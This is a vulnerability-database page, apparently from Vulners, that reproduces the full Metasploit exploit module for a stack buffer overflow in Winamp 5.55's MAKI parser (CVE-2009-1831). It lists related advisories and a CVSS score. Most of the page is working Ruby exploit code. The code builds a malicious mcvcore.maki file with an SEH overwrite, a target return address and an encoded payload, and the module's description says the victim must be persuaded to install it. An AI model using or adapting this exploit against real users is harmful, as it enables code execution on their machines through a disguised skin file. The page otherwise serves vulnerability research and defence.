Lucene search
K

Winamp MAKI Buffer Overflow

🗓️ 10 Sep 2012 14:46:16Reported by Monica Sojeong Hong, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 18 Views

Stack buffer overflow in Winamp 5.5

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Winamp MAKI Buffer Overflow
11 Sep 201200:00
zdt
Tenable Nessus
Winamp < 5.552 Buffer Overflow
18 Aug 200400:00
nessus
Tenable Nessus
Winamp < 5.552 Modern Skins Support Module (gen_ff.dll) MAKI File Handling Overflow
22 May 200900:00
nessus
Circl
CVE-2009-1831
22 May 200900:00
circl
Check Point Advisories
Winamp Maki File Buffer Overflow - Ver2 (CVE-2009-1831)
16 Apr 201400:00
checkpoint_advisories
Check Point Advisories
Winamp Maki File Buffer Overflow (CVE-2009-1831)
22 Mar 201700:00
checkpoint_advisories
CVE
CVE-2009-1831
29 May 200922:00
cve
Cvelist
CVE-2009-1831
29 May 200922:00
cvelist
Exploit DB
Winamp - MAKI Buffer Overflow (Metasploit)
12 Sep 201200:00
exploitdb
NVD
CVE-2009-1831
29 May 200922:30
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Winamp MAKI Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
        exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
        where memmove is used in an insecure way with user controlled data.

        To exploit the vulnerability the attacker must convince the victim to install the
        generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
        or generate a new skin using the crafted mcvcore.maki file. The module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Monica Sojeong Hong', # Vulnerability Discovery
          'juan vazquez'	# Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2009-1831'],
          [ 'OSVDB', '54902'],
          [ 'BID', '35052'],
          [ 'EDB', '8783'],
          [ 'EDB', '8772'],
          [ 'EDB', '8770'],
          [ 'EDB', '8767'],
          [ 'URL', 'http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 4000,
          'DisableNops' => true,
          'BadChars'    => ""
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # winamp.exe 5.5.5.2405
          [ 'Winamp 5.55 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret' => 0x12f02bc3, # ppr from in_mod.dll
              'Offset' => 16756
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2009-05-20',
      'DefaultTarget'  => 0))

    deregister_options('FILENAME')
  end

  def file_format_filename
    'mcvcore.maki'
  end

  def exploit

    sploit = rand_text(target['Offset'])
    sploit << generate_seh_record(target.ret)
    sploit << payload.encoded
    length_sploit = [sploit.length].pack("v")

    header = "\x46\x47" # magic
    header << "\x03\x04" # version
    header << "\x17\x00\x00\x00"
    types  = "\x01\x00\x00\x00" # count
    # class 1 => Object
    types << "\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7"
    # functions
    functions = "\x37\x00\x00\x00" # count
    #function 1
    functions << "\x01\x01" # class
    functions << "\x00\x00" # dummy
    functions << length_sploit # function name length
    functions << sploit # crafted function name

    maki = header
    maki << types
    maki << functions

    print_status("Creating '#{file_format_filename}' file ...")

    file_create(maki)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.2High risk
Vulners AI Score7.2
CVSS 29.3
EPSS0.36337
18